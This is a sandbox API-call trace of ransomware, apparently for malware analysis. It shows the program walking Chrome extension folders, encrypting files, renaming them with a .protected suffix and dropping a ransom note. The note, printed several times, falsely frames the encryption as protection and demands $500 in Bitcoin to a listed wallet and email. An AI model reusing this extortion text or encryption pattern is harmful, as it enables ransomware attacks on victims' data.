returned -1 [0079.004] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.004] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.004] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\..") returned 144 [0079.004] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.004] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.004] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.004] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.004] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.004] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned 
-1 [0079.004] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.004] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.004] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json") returned 155 [0079.005] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.005] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.005] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.005] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.005] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.005] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json") returned 155 [0079.005] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.005] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json") returned 155 [0079.005] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.005] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json") returned 155 [0079.005] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.006] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd1, lpOverlapped=0x0) returned 1 [0079.006] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.006] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd1, lpOverlapped=0x0) returned 1 [0079.006] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.006] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.006] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.007] CloseHandle (hObject=0x168) returned 1 [0079.007] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json.protected") returned 165 [0079.007] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json.protected")) returned 1 [0079.007] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.007] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.007] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\RESTORE_FILES.txt") returned 159 [0079.007] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.007] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.007] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.008] lstrlenA (lpString="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") returned 684 [0079.008] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0079.008] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.008] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.008] CloseHandle (hObject=0x164) returned 1 [0079.008] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.008] lstrcmpiW (lpString1="it", lpString2="Windows") returned -1 [0079.008] lstrcmpiW (lpString1="it", lpString2="Program Files") returned -1 [0079.008] lstrcmpiW (lpString1="it", lpString2="Program Files (x86)") returned -1 [0079.008] lstrcmpiW (lpString1="it", lpString2="$Recycle.bin") returned 1 [0079.008] lstrcmpiW (lpString1="it", lpString2="System Volume Information") returned -1 [0079.008] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it") returned 141 [0079.008] lstrcmpW (lpString1="it", lpString2=".") returned 1 [0079.008] lstrcmpW (lpString1="it", lpString2="..") returned 1 [0079.009] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\*") returned 143 [0079.009] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.009] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.009] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.009] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.009] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.009] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.009] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\.") returned 143 [0079.009] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.009] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.009] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.009] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.009] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.009] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.009] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.009] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\..") returned 144 [0079.009] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.009] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.009] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.009] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.009] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.009] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned 
-1 [0079.009] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.009] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.009] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json") returned 155 [0079.009] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.009] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.009] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.009] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.009] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.010] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json") returned 155 [0079.010] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.010] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json") returned 155 [0079.010] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.010] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json") returned 155 [0079.010] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.010] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd5, lpOverlapped=0x0) returned 1 [0079.010] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.010] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd5, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd5, lpOverlapped=0x0) returned 1 [0079.010] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.011] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.011] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.011] CloseHandle (hObject=0x168) returned 1 [0079.011] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json.protected") returned 165 [0079.011] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json.protected")) returned 1 [0079.011] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.011] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.011] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\RESTORE_FILES.txt") returned 159 [0079.011] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.012] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.012] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.013] lstrlenA (lpString="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") returned 684 [0079.013] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0079.013] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.013] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.013] CloseHandle (hObject=0x164) returned 1 [0079.013] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.013] lstrcmpiW (lpString1="ja", lpString2="Windows") returned -1 [0079.013] lstrcmpiW (lpString1="ja", lpString2="Program Files") returned -1 [0079.013] lstrcmpiW (lpString1="ja", lpString2="Program Files (x86)") returned -1 [0079.013] lstrcmpiW (lpString1="ja", lpString2="$Recycle.bin") returned 1 [0079.013] lstrcmpiW (lpString1="ja", lpString2="System Volume Information") returned -1 [0079.013] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja") returned 141 [0079.013] lstrcmpW (lpString1="ja", lpString2=".") returned 1 [0079.013] lstrcmpW (lpString1="ja", lpString2="..") returned 1 [0079.013] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\*") returned 143 [0079.013] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.013] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.013] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.013] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.013] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.013] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.013] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\.") returned 143 [0079.013] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.013] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.014] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.014] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.014] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.014] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.014] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.014] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\..") returned 144 [0079.014] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.014] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.014] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.014] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.014] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.014] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned 
-1 [0079.014] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.014] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.014] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json") returned 155 [0079.014] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.014] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.014] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.014] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.014] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.015] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json") returned 155 [0079.015] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.015] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
